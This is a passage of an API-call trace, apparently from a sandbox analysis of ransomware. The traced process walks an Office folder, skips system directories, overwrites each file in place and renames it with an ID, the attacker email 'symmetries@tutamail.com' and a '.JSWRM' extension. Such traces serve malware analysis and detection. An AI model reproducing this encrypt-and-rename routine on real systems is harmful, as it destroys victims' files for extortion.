hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0140.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0140.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0140.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0140.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0140.787] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATALOG.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catalog.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATALOG.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catalog.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0140.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0140.788] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x218d63bb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x218d63bb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x218d63bb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x62f96, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CATWIZ.POC", cAlternateFileName="")) returned 1 [0140.788] lstrcmpiW (lpString1="CATWIZ.POC", lpString2=".") returned 1 [0140.788] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="..") returned 1 [0140.788] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="...") returned 1 [0140.788] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="windows") returned -1 [0140.788] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="recovery") returned -1 [0140.788] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="perflogs") returned -1 [0140.789] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="documents and settings") returned -1 [0140.789] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.789] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="system volume information") returned -1 [0140.789] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="msocache") returned -1 [0140.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0140.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATWIZ.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATWIZ.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CATWIZ.POC", lpUsedDefaultChar=0x0) returned 10 [0140.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0140.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0140.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATWIZ.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0140.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATWIZ.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CATWIZ.POC", lpUsedDefaultChar=0x0) returned 10 [0140.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0140.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0140.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0140.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0140.789] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATWIZ.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catwiz.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.790] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=405398) returned 1 [0140.790] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0140.790] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.803] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.803] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0140.804] CloseHandle (hObject=0x238) returned 1 [0140.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0140.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0140.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0140.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0140.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0140.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.805] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATWIZ.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catwiz.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATWIZ.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catwiz.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0140.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0140.806] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x24f44, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CATWIZ11.POC", cAlternateFileName="")) returned 1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2=".") returned 1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2="..") returned 1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2="...") returned 1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2="windows") returned -1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2="recovery") returned -1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2="perflogs") returned -1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2="documents and settings") returned -1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2="$RECYCLE.BIN") returned 1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2="system volume information") returned -1 [0140.806] lstrcmpiW (lpString1="CATWIZ11.POC", lpString2="msocache") returned -1 [0140.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0140.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATWIZ11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATWIZ11.POC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CATWIZ11.POC", lpUsedDefaultChar=0x0) returned 12 [0140.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0140.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0140.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATWIZ11.POC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CATWIZ11.POC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CATWIZ11.POC", lpUsedDefaultChar=0x0) returned 12 [0140.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0140.806] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0140.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0140.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0140.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATWIZ11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catwiz11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.808] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=151364) returned 1 [0140.808] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.808] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x24f40) returned 0x2501e8 [0140.808] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x24f40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x24f40, lpOverlapped=0x0) returned 1 [0140.819] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.819] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x24f40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x24f40, lpOverlapped=0x0) returned 1 [0140.819] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0140.819] CloseHandle (hObject=0x238) returned 1 [0140.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0140.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.819] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.819] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0140.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0140.820] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0140.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0140.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0140.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0140.820] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0140.820] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATWIZ11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catwiz11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CATWIZ11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\catwiz11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0140.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0140.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0140.821] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21994fc3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x21994fc3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x21994fc3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c1df, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="CERT.DPV", cAlternateFileName="")) returned 1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2=".") returned 1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2="..") returned 1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2="...") returned 1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2="windows") returned -1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2="recovery") returned -1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2="perflogs") returned -1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2="documents and settings") returned -1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2="system volume information") returned -1 [0140.821] lstrcmpiW (lpString1="CERT.DPV", lpString2="msocache") returned -1 [0140.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0140.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT.DPV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERT.DPV", lpUsedDefaultChar=0x0) returned 8 [0140.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0140.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0140.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CERT.DPV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CERT.DPV", lpUsedDefaultChar=0x0) returned 8 [0140.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0140.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0140.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0140.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0140.822] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.823] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=180703) returned 1 [0140.823] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0140.823] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0140.835] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.835] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0140.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0140.835] CloseHandle (hObject=0x238) returned 1 [0140.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0140.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0140.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0140.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0140.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0140.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0140.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0140.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.836] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\cert.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\CERT.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft 